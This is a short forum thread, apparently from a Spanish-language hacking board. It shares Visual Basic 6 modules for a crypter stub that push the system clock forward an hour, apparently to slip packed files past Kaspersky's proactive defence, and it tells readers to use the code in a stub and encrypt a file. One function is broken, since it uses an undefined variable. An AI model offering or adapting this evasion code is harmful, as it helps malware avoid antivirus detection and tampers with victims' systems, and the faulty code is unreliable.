Hello, I find module a source of Crypter with this option, is making the clock go back 1 hour.
I not Have Kaspersky but ammend this idea in two Modules:

Código: Seleccionar todo

Option Explicit
Private Declare Function SetSystemTime Lib "kernel32.dll" (lpSystemTime As SYSTEMTIME) As Long
 Private Declare Sub GetSystemTime Lib "kernel32.dll" (lpSystemTime As SYSTEMTIME)

 Private Type SYSTEMTIME
   wYear As Integer
   wMonth As Integer
   wDayOfWeek As Integer
   wDay As Integer
   wHour As Integer
   wMinute As Integer
   wSecond As Integer
   wMilliseconds As Integer
 End Type

Public Function ProactiveNull1()
 Dim Hourx      As String
 Dim TimeX      As String

  Hourx = Left(Time, 2)

  TimeX = Replace(Time, xd, xd + 1)
  Time = TimeX
End Function

Public Function ProactiveNull2()
On Error Resume Next

 Dim Actual           As SYSTEMTIME
 
 Call GetSystemTime(Actual)
   Actual.wHour = Actual.wHour + 1
   Call SetSystemTime(Actual)
 
End Function
For test use code in stub and Encrypt file.
En tu ventana
Y en tu ventana, gritas al cielo pero lo dices callada..
Ingeniossimo en cuanto tenga un momento codeo un crypter en plan broma y le meto el modulo Gracias por invertir su tiempo asi hermano.

Salu2
Blog técnico dedicado a la seguridad informática y al estudio de nuevas vulnerabilidades.
Blog: http://www.seginformatica.net
Twitter: https://twitter.com/#!/p0is0nseginf
Responder

Volver a “Otros lenguajes”